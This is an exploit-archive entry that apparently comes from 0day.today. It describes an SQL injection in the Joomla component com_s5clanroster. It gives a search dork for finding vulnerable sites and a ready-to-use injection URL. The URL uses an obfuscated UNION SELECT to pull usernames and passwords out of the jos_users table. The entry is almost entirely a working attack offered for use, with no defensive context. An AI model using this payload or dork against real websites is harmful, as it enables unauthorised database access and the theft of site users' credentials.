id: 20759
date: 05/12/2013
title: Joomla Component com_s5clanroster Sql Injection Vulnerability
author: AtT4CKxT3rR0r1ST
cves: 

Joomla Component com_s5clanroster Sql Injection Vulnerability
==============================================================
 
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Dork           : inurl:"com_s5clanroster"
.:. Script         : http://www.newone.org/s5-clan-roster-shape5-extensions
####################################################################
===[ Exploit ]===

Sql Injection:
==============

www.site.com/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=1[sql]

www.site.com/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null'+/*!50000UnIoN*/+/*!50000SeLeCt*/group_concat(username,0x3a,password),222+from+jos_users-- -
####################################################################

#  0day.today [2023-03-21]  #